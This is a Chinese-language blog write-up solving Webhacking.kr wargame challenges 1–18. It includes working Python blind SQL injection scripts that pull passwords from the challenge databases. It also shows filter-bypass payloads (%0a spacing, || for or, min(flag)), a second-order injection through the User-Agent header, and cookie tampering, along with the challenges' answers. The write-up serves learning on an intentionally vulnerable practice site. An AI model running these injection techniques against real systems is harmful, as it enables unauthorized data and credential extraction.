[置顶] Webhacking.kr writeup(更新至challenge 18)
Webhacking.kr writeup
先附上题目的链接
http://webhacking.kr
challenge 1
第一个先看源码,
<a onclick=location.href='index.phps'>----- index.phps -----</a>先有一个跳转,跟过去看看
又得到了一些源码,重点的如下:
<?
$password="????";
if(eregi("[^0-9,.]",$_COOKIE[user_lv])) $_COOKIE[user_lv]=1;
if($_COOKIE[user_lv]>=6) $_COOKIE[user_lv]=1;
if($_COOKIE[user_lv]>5) @solve();
echo("<br>level : $_COOKIE[user_lv]");
?>这里很容易就看出把cookie中的user_lv随便一个5-6之间的小树就可以了,所以直接抓包修改就行了
challenge 2
好吧这道题。。半知半解加上猜测勉强算是做出来。
回到正题。
点进去是这个样子
然后开始找线索,注意,该页的源码里面发现了很关键的东西
![[置顶] Webhacking.kr writeup(更新至challenge 18)_第1张图片](http://img.e-com-net.com/image/info5/8a6e2c9673a44f09904e5df1e1f82daa.png)
这就是那条龙对应的连接,点一下就进到了登录admin的界面
试了试没法儿注入,然后还发现了这里有个关键的东西:
![[置顶] Webhacking.kr writeup(更新至challenge 18)_第2张图片](http://img.e-com-net.com/image/info5/af39708a6b1c476ca8e31207d9a74868.jpg)
又是要密码,试了试也没有可以注入的迹象,然后整个人都好了,看了题解之后(韩文题解,只能看懂图,爽翻。。。)
说是首页这里有问题
![[置顶] Webhacking.kr writeup(更新至challenge 18)_第3张图片](http://img.e-com-net.com/image/info5/adf3ad7a9c8748c993a38a542555fc9a.png)
首页时
间注释掉了,然后通过抓包
![[置顶] Webhacking.kr writeup(更新至challenge 18)_第4张图片](http://img.e-com-net.com/image/info5/2bf48b4ae3ce45c99a7f78e1eeb18c63.png)
试试这里有没有问题,把这里改成如下:
time=1460468419 and 1=1发现时间变成了
那么再试试
time=1460468419 or 1=0所以这里是存在盲注的,那么就可以尝试爆一点东西出来,
由于无法判断是什么数据库,自然也不好直接爆,顶多爆一下库名之类没什么卵用的东西。这里主要是猜想刚才那个admin界面的表对应是admin表,然后猜解他的password字段,
对应的python代码也比较简单,贴一贴吧
import requests
import re
db_length=-1
db_name=""
url = 'http://webhacking.kr/challenge/web/web-02/index.php'
r=requests.session()
def doinject(param):
header={"Cookie":"time="+param+";PHPSESSID=58ltk3o56jd4ug007chbiorne3"}
result=r.get(url,headers=header)
content=result.content
#print content
if "09:00:01" in content:
return 1
return 0
def get_admin_pass():
global db_length
global db_name
for i in xrange(100):
param="1460468419 and if((select length(password) from admin)="+str(i)+",1,0)"
if doinject(param):
db_length=i
break
print db_length
for i in xrange(1,db_length+1):
start=48
end=122
while(start!=end):
#print str(start)+" : "+str(end)
if(end-start==1):
param="1460468419 and if(ascii(substr((select password from admin),"+str(i)+",1))="+str(start)+",1,0)"
if(doinject(param)):
end=start
else:
start=end
else:
mid=(start+end)/2
param="1460468419 and if(ascii(substr((select password from admin),"+str(i)+",1))>="+str(mid)+",1,0)"
if(doinject(param)):
start=mid
else:
end=mid
db_name+=chr(start)
print db_name
print db_name
get_admin_pass()![[置顶] Webhacking.kr writeup(更新至challenge 18)_第5张图片](http://img.e-com-net.com/image/info5/5d93aea829304d5dacd286a98690c1b0.png)
所以密码就是0nly_admin。
那么用这个密码去登录admin页面,得到提示:
![[置顶] Webhacking.kr writeup(更新至challenge 18)_第6张图片](http://img.e-com-net.com/image/info5/98e80c29583b439d8f0c6fff4e207b94.png)
(尼玛啊,韩文提示你大爷的。。。。百度谷歌翻译一下把)
好歹告诉了一个什么密码还是什么的东西吧。试了试不是board处的密码。
好吧,到这里就怼不动了,看看题解,发现莫名其妙的脑洞第二个表名
![[置顶] Webhacking.kr writeup(更新至challenge 18)_第7张图片](http://img.e-com-net.com/image/info5/f8270311c2574b479a649d1d6525bf5d.jpg)
已跪好吧!
有了第二个表名,又来猜密码,代码都不用变,直接把表名换成FreeB0aRd就可以了,真是烦,浪费我这么多时间,结果是个脑洞。
![[置顶] Webhacking.kr writeup(更新至challenge 18)_第8张图片](http://img.e-com-net.com/image/info5/b69f341e07e44bf6be72135d78800d29.png)
所以board处的密码就是7598522ae。
输入之后出现个链接,给了个zip,__AdMiN__FiL2.zip,打开,是一个html文件
好吧,这个是有解压密码的,突然想到刚才在admin界面拿到的提示还没有用,那个密码@dM1n__nnanual,输入进去果然成功解压了!打开html文件
卧槽卧槽,终于出来了
![[置顶] Webhacking.kr writeup(更新至challenge 18)_第9张图片](http://img.e-com-net.com/image/info5/463f6e2275f64f18878e0b283a6d2486.jpg)
所以flag就是这个了,HacKed_by_n0b0dY,好吧这道题我已经报警了,浪费了我整整快一天时间了。。。结果就尼玛脑洞过来的(好吧,可能是因为看不懂韩文,没有找到hint的位置吧)
然后去提交就行了。
challenge 3
打开就是这样一个网页
![[置顶] Webhacking.kr writeup(更新至challenge 18)_第10张图片](http://img.e-com-net.com/image/info5/1db02e69498247c997f064fee6b2b38b.png)
然后简单看看,只有右下角的5*5格子可以操作,看看源码也并没有什么有价值的东西
然后观察格子,最后猜测,就是每一行或每一列对应的就是我们应该画上的黑格子的数量,比如一个3,我们就要画三个连续的黑格子,比如111,我们就要画三个间隔的黑格子,所以试了试之后,如下:
![[置顶] Webhacking.kr writeup(更新至challenge 18)_第11张图片](http://img.e-com-net.com/image/info5/fcaa07ee11a74476acb7e1987bc7fbe8.png)
出现一个输入框,先抓包看看,也没有什么异样,尝试注入,发现answer字段这里有注入的迹象
试了试之后,发现像是',or,#等等都被过滤了,最后成功的payload就是这个
![[置顶] Webhacking.kr writeup(更新至challenge 18)_第12张图片](http://img.e-com-net.com/image/info5/68165440df1343e19a8ad28df7954cde.png)
用||代替or,所以根据返回来看,答案就是new_sql_injection这个了
challenge 4
一看先是个base64解码,然后又是sha1解密,接着还是sha1解密
比较简单,最后答案就是test
不做赘述
challenge 5
这道题应该是比较简单的了,我觉得明明应该是对的但还是出不来,浪费了不少时间,这里先不写,回头再来补把。
challenge 6
看源码,一堆替换,第一部分php代码就是当我们没有设定cookie的时候它会自动生成,这部分不用管。重点是第二部分,
$decode_id=$_COOKIE[user];
$decode_pw=$_COOKIE[password];
$decode_id=str_replace("!","1",$decode_id);
$decode_id=str_replace("@","2",$decode_id);
$decode_id=str_replace("$","3",$decode_id);
$decode_id=str_replace("^","4",$decode_id);
$decode_id=str_replace("&","5",$decode_id);
$decode_id=str_replace("*","6",$decode_id);
$decode_id=str_replace("(","7",$decode_id);
$decode_id=str_replace(")","8",$decode_id);
$decode_pw=str_replace("!","1",$decode_pw);
$decode_pw=str_replace("@","2",$decode_pw);
$decode_pw=str_replace("$","3",$decode_pw);
$decode_pw=str_replace("^","4",$decode_pw);
$decode_pw=str_replace("&","5",$decode_pw);
$decode_pw=str_replace("*","6",$decode_pw);
$decode_pw=str_replace("(","7",$decode_pw);
$decode_pw=str_replace(")","8",$decode_pw);
for($i=0;$i<20;$i++)
{
$decode_id=base64_decode($decode_id);
$decode_pw=base64_decode($decode_pw);
}
echo("<font style=background:silver;color:black> HINT : base64 </font><hr><a href=index.phps style=color:yellow;>index.phps</a><br><br>");
echo("ID : $decode_id<br>PW : $decode_pw<hr>");
if($decode_id=="admin" && $decode_pw=="admin")
{
@solve(6,100);
}
一开始的替换也没什么用,接着是base64解密20次,解密之后的值如果和admin相等的话,那么解决问题。
这个就比较简单了,我们把adminbase64加密20次不就完了么,如下:
import base64
a = "admin"
for i in xrange(20):
a=base64.b64encode(a)
print a然后把生成的一大串东西抓包替换掉原有cookie中的user和password就行了。
challenge 7
这里源码在index.phps下面,我摘录了比较重要的部分
........
........
if(eregi("--|2|50|\+|substring|from|infor|mation|lv|%20|=|!|<>|sysM|and|or|table|column",$ck)) exit("Access Denied!");
if(eregi(' ',$ck)) { echo('cannot use space'); exit(); }
........
........
if($data[0]==2) { echo("<input type=button style=border:0;bgcolor='gray' value='auth' onclick= alert('Congratulation')><p>"); @solve(); } 这里的随机数没有必要去想办法绕过,只要找到绕过过滤的方法,多试几次,总用一次随机数能够和你的payload对上,
这里主要是注意下过滤了空格和2,其实有很多种替换方法,比如/**/,或是编码%0a,2的话就可以变成3-1,所以构造的payload如下:
http://webhacking.kr/challenge/web/web-07/index.php?val=0)%0aunion%0aselect%0a(3-1然后多尝试几次就好了,或是写个简单的脚本:
#-+- coding:utf-8 -+-
import requests
url='http://webhacking.kr/challenge/web/web-07/index.php?val=0)%0aunion%0aselect%0a(3-1'
param={'Cookie':'PHPSESSID=iajr6agbpqaijt379p1ef14ip4'};
num=0;
while True:
r=requests.get(url,headers=param)
num+=1
print num
content = r.content
if 'nice try!' not in content:
print content
break;challenge 8
这道题的源代码也在index.phps下面,这里就是一个比较基础的二次注入。
这里我把重要的分析写在源码里面了,源码如下:
$agent=getenv("HTTP_USER_AGENT");
$ip=$_SERVER[REMOTE_ADDR];
$agent=trim($agent);
$agent=str_replace(".","_",$agent);
$agent=str_replace("/","_",$agent);
//这里各种匹配,但是关键的单引号是可以使用的
$pat="/\/|\*|union|char|ascii|select|out|infor|schema|columns|sub|-|\+|\||!|update|del|drop|from|where|order|by|asc|desc|lv|board|\([0-9]|sys|pass|\.|like|and|\'\'|sub/";
$agent=strtolower($agent);
if(preg_match($pat,$agent)) exit("Access Denied!");
//这里又重新获取了一次user-agent,然后把单引号和双引号都怼掉了,不能用了,所以这里没办法注入了
$_SERVER[HTTP_USER_AGENT]=str_replace("'","",$_SERVER[HTTP_USER_AGENT]);
$_SERVER[HTTP_USER_AGENT]=str_replace("\"","",$_SERVER[HTTP_USER_AGENT]);
$count_ck=@mysql_fetch_array(mysql_query("select count(id) from lv0"));
if($count_ck[0]>=70) { @mysql_query("delete from lv0"); }
//没办法直接注入的,因为单引号到此为止已经被匹配掉了
$q=@mysql_query("select id from lv0 where agent='$_SERVER[HTTP_USER_AGENT]'");
$ck=@mysql_fetch_array($q);
if($ck)
{
echo("hi <b>$ck[0]</b><p>");
if($ck[0]=="admin")
{
@solve();
@mysql_query("delete from lv0");
}
}
//注入点在这里,变量$agent是可以有单引号的,而且是我们可以控制的。所以我们可以先把admin账户插入进去,然后在访问admin就行了
if(!$ck)
{
$q=@mysql_query("insert into lv0(agent,ip,id) values('$agent','$ip','guest')") or die("query error");
echo("<br><br>done! ($count_ck[0]/70)");
}
?>所以第一次我们先截包把user-agent改成如下:
admin','1','admin')#这样子执行下来,就成功把这行记录插入到了lv0表中去了。
然后我们再截一次包,直接把user-agent改成admin就成功了。
两次截图如下:
![[置顶] Webhacking.kr writeup(更新至challenge 18)_第13张图片](http://img.e-com-net.com/image/info5/96f8de43c1434db3aad976552e171273.jpg)
![[置顶] Webhacking.kr writeup(更新至challenge 18)_第14张图片](http://img.e-com-net.com/image/info5/4570df4ee1594dc7ba07b691c095e344.png)
challenge 9
![[置顶] Webhacking.kr writeup(更新至challenge 18)_第15张图片](http://img.e-com-net.com/image/info5/bc6bab00f130410b944ff92e4e904b8c.png)
这里一点开是个这样子的东西,截了个包发现是这么个情况,
典型的Basic Authorization验证的,这里怎么输入密码都没有,几次尝试之后应该是不存在注入的,然后脑动一下换一个请求方式,
改成POST也不行,改成PUT一下子就进去了。
应该是这个网站限定了不能使用GET和POST,那么我们再burpsuite里设定一下,将所有包的GET请求都替换成PUT,
![[置顶] Webhacking.kr writeup(更新至challenge 18)_第16张图片](http://img.e-com-net.com/image/info5/abb3a9606bfe4c93a537755bc4f85e7d.jpg)
这里不懂的可以看一下我之前的介绍burpsuite的博客
http://blog.csdn.net/qq_19876131/article/details/50792020
然后知道当
no=1的时候回显的是apple
no=2的时候回显的是banana
np=3的时候是未知的,并给了提示那么我们得想办法爆出no=3的时候的id是啥。
进过多次尝试之后,发现很多都被过滤掉了,最后试出的payload如下:
if(substr(id,1,1)in(0x41),3,0)然后写了个脚本爆破一下id,如下:
import requests
url = "http://webhacking.kr/challenge/web/web-09/"
r=requests.session()
pw=""
def doinject(param):
headers = {"Cookie" : "PHPSESSID=brbg4rmf75uvj2gv4ff3n090i2"}
payload="no="+param
result=r.put(url,params=payload,headers=headers)
content=result.content
#print content
if "Secret" in content:
return 1
return 0
for x in xrange(1,12):
for y in xrange(32,127):
param="if(substr(id,"+str(x)+",1)in("+hex(y)+"),3,0)"
if doinject(param)>0:
pw += chr(y)
print pw
break
print pw 得到如下:
![[置顶] Webhacking.kr writeup(更新至challenge 18)_第17张图片](http://img.e-com-net.com/image/info5/77e9902162194c10b1dd9a85cb643ed7.png)
然后试了试,没有成功,全部变成小写,成功了,所以最后的密码就是
alsrkswhaql
challenge 10
这道题源代码如下:
<html>
<head>
<title>Challenge 10</title>
</head>
<body>
<hr style=height:100;background:brown;>
<table border=0 width=900 style=background:gray>
<tr><td>
<a id=hackme style="position:relative;left:0;top:0" onclick="this.style.posLeft+=1;if(this.style.posLeft==800)this.href='?go='+this.style.posLeft" onmouseover=this.innerHTML='yOu' onmouseout=this.innerHTML='O'>O</a><br>
<font style="position:relative;left:800;top:0" color=gold>|<br>|<br>|<br>|<br>buy lotto</font>
</td></tr>
</table>
<hr style=height:100;background:brown;>
</body>
</html>
读懂js的意思,就是this.style.posLeft==800时访问http://webhacking.kr/challenge/codeing/code1.html?go=800,那我们直接访问,弹出no hack,那么这里抓个包没有发现什么异样,那就多半是Referer了,把Referer跟上,成功!
![[置顶] Webhacking.kr writeup(更新至challenge 18)_第18张图片](http://img.e-com-net.com/image/info5/137c7d2e568645d8b65bce9ebff058bb.jpg)
challenge 11
这里一开始看到正则如下:
$pat="/[1-3][a-f]{5}_.*218.29.102.122.*\tp\ta\ts\ts/";
if(preg_match($pat,$_GET[val])) { echo("Password is ????"); }意思就是一个匹配,匹配到就成功了,
你找一个在线测试的网站试几次就行了,这也是比较基础的正则,最后结果如下:
1aaaaa_11218129110211221111 p a s s注意要URL编码一下,答案如下:
http://webhacking.kr/challenge/codeing/code2.html?val=1aaaaa_11218129110211221111%09p%09a%09s%09schallenge 12
一道js解密的题,把源码直接全部复制到本地,然后将脚本中的eval改成document.write,放到浏览器里源代码就出来了,然后格式化一下如下:
var enco = '';
var enco2 = 126;
var enco3 = 33;
var ck = document.URL.substr(document.URL.indexOf('='));
for (i = 1; i < 122; i++) {
enco = enco + String.fromCharCode(i, 0);
}
function enco_(x) {
return enco.charCodeAt(x);
}
if (ck == "=" + String.fromCharCode(enco_(240)) + String.fromCharCode(enco_(220)) + String.fromCharCode(enco_(232)) + String.fromCharCode(enco_(192)) + String.fromCharCode(enco_(226)) + String.fromCharCode(enco_(200)) + String.fromCharCode(enco_(204)) + String.fromCharCode(enco_(222 - 2)) + String.fromCharCode(enco_(198)) + "~~~~~~" + String.fromCharCode(enco2) + String.fromCharCode(enco3)) {
alert("Password is " + ck.replace("=", ""));
}这里直接alert一下这一就出来了
String.fromCharCode(enco_(240)) + String.fromCharCode(enco_(220)) + String.fromCharCode(enco_(232)) + String.fromCharCode(enco_(192)) + String.fromCharCode(enco_(226)) + String.fromCharCode(enco_(200)) + String.fromCharCode(enco_(204)) + String.fromCharCode(enco_(222 - 2)) + String.fromCharCode(enco_(198)) + "~~~~~~" + String.fromCharCode(enco2) + String.fromCharCode(enco3)所以得到答案就是youaregod~~~~~~~!
去首页提交一下就好了。
challenge 13
一道很直接的SQL注入题,有个hint是select flag from prob13password
简单尝试了一下,发现可以用bool盲注,输入1的时候如下:
而别的输入要么无反应,要么返回0。
这里试了一会儿,发现很多很多都被过滤了,不过select可以用的,然后像是union、and、|、&、空格、=,都被过滤了。空格这里只能用%0a代替,连/**/都被过滤了。
但是还有两个盲注很关键的东西没有过滤,if和substr,然后试到这里我们可以想到构造如下payload
0%0aor%0aif(substr((select%0aflag%0afrom%0aprob13password),1,1)in("0x41"),1,0)发现并没有回显,然后多次更改来回尝试之后,发现是flag字段的问题,比如我们尝试这样子的语句
0%0aor%0aif(substr((select%0aflag%0afrom%0aprob13password),1,1)in("0x41"),1,1)也就是说if语句永远返回1,但是最后还是没有回显,说明问题出在flag字段上,当我们换成这样子
0%0aor%0aif(substr((select%0acount(flag)%0afrom%0aprob13password),1,1)in("0x41"),1,1)于是有了回显,然后我们就意识到那个flag字段不能单独用,那就想想SQL有哪些聚合函数,最后折腾之后,想到了MAX()和MIN()函数,然后可以用substr(min(flag),1,1)代替原有的单独flag字段绕开过滤,这样子我们就一个个爆出了min(flag)的值(注意,这里MAX(flag)的值经过爆破得到是FLAG,不是最后答案)
然后写个脚本,由于是顺序猜解,速度比较慢,代码如下:
import requests
url = "http://webhacking.kr/challenge/web/web-10/"
r=requests.session()
pw=""
def doinject(param):
headers = {"Cookie" : "PHPSESSID=brbg4rmf75uvj2gv4ff3n090i2"}
payload="no="+param
result=r.get(url,params=payload,headers=headers)
content=result.content
#print content
if "<tr><td>1</td></tr>" in content:
return 1
return 0
for x in xrange(1,25):
for y in xrange(32,127):
param="0%0aor%0aif(substr((select%0asubstr(min(flag),"+str(x)+",1)%0afrom%0aprob13password),1,1)in("+hex(y)+"),1,0)"
#print str(x)+" : "+hex(y)
if doinject(param)>0:
pw += chr(y)
print pw
break
print pw结果如下图
![[置顶] Webhacking.kr writeup(更新至challenge 18)_第19张图片](http://img.e-com-net.com/image/info5/c84a2aea145a4b68a5a2b6989605b167.png)
所以最后的答案就是challenge13luckclear
challenge 14
源代码如下:
function ck() {
var ul=document.URL;
ul=ul.indexOf(".kr");
ul=ul*30;
if(ul==pw.input_pwd.value) { alert("Password is "+ul*pw.input_pwd.value); }
else { alert("Wrong"); }
}这里直接放到firebug里面调试下就知道了,如下图:
![[置顶] Webhacking.kr writeup(更新至challenge 18)_第20张图片](http://img.e-com-net.com/image/info5/e422340fc34d447db940b2ece9dfedae.jpg)
得到值是510,所以输入510就是最后答案了,随后得到如下:
![[置顶] Webhacking.kr writeup(更新至challenge 18)_第21张图片](http://img.e-com-net.com/image/info5/ae7a9041b4a440dfbe7794dcb1c4c803.jpg)
所以最后的答案就是260100,首页提交即可
challenge 15
这里再弹窗回跳的时候,答案就出来了的,随便拦截一下包就看到了
首页提交即可
challenge 16
这道题也是比较简单的js题,代码如下:
<html>
<head>
<title>Challenge 16</title>
<body bgcolor=black onload=kk(1,1) onkeypress=mv(event.keyCode)>
<font color=silver id=c></font>
<font color=yellow size=100 style=position:relative id=star>*</font>
<script> document.body.innerHTML+="<font color=yellow id=aa style=position:relative;left:0;top:0>*</font>"; function mv(cd) { kk(star.style.posLeft-50,star.style.posTop-50); if(cd==100) star.style.posLeft=star.style.posLeft+50; if(cd==97) star.style.posLeft=star.style.posLeft-50; if(cd==119) star.style.posTop=star.style.posTop-50; if(cd==115) star.style.posTop=star.style.posTop+50; if(cd==124) location.href=String.fromCharCode(cd); } function kk(x,y) { rndc=Math.floor(Math.random()*9000000); document.body.innerHTML+="<font color=#"+rndc+" id=aa style=position:relative;left:"+x+";top:"+y+" onmouseover=this.innerHTML=''>*</font>"; } </script>
</body>
</html>
看到就是mv函数最后当cd==124的时候大概就是我们需要的东西,所以直接构造就行了,在firebug加个事件就行了,把他的这个
onkeypress=mv(event.keyCode)改成onmouseover=mv(124),鼠标挪过去,就得到了如下:
直接去首页提交就行了。
challenge 17
直接放在firebug的console下运行即可,如下得到unlock的值,
![[置顶] Webhacking.kr writeup(更新至challenge 18)_第22张图片](http://img.e-com-net.com/image/info5/7a85e497d65d4d368d87317285f4b09a.jpg)
然后的得到unlock的值,填入得到答案为999780930.7,首页提交即可
challenge 18
这道题给出了源码,如下:
<? if($_GET[no]) { if(eregi(" |/|\(|\)|\t|\||&|union|select|from|0x",$_GET[no])) exit("no hack"); $q=@mysql_fetch_array(mysql_query("select id from challenge18_table where id='guest' and no=$_GET[no]")); if($q[0]=="guest") echo ("hi guest"); if($q[0]=="admin") { @solve(); echo ("hi admin!"); } } ?> 有一个简单的过滤,像是or这种关键的词没有过滤就很好办了,payload如下:
1%0aor%0a1%0alimit%0a1,1让where永真,然后通过limit语句控制选中admin即可